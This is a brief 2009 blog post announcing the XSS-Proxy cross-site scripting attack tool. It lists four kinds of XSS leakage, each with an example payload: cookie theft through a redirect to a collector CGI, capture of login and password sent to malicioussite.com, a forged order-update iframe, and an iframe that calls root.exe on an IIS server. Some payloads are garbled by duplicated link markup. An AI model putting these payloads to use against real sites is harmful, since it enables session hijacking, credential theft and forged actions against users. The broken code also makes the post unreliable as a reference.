Cross Site Scripting Attack Tool
By admin on Oct 27, 2009 in hacking, open source
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool.
Types of information leakage due to XSS attack
1. Client can reveal cookies to 3rd party (session state, order info, etc)
http://host/a.php?variable="><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi">http://host/a.php?variable="><script>document.location=’http://www.cgisecurity.com/cgi-bin/cookie.cgi?
‘%20+document.cookie</script>
2. Client can reveal posted form items to 3rd party (userID/passwd, etc)
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src=’http://www.malicioussite.com/’+document.forms(1).login.value’+’:’+ document.forms(1).password.value;" </form>
3. Client can be tricked into accessing/posting spoofed info to trusted server
http://www.trustedserver.com/xss.asp?name">www.trustedserver.com/xss.asp?name = <iframe
src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>
4. Client can be tricked into attacking other sites
/hello.asp?name = <iframe
src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe>
Sorry, comments for this entry are closed at this time.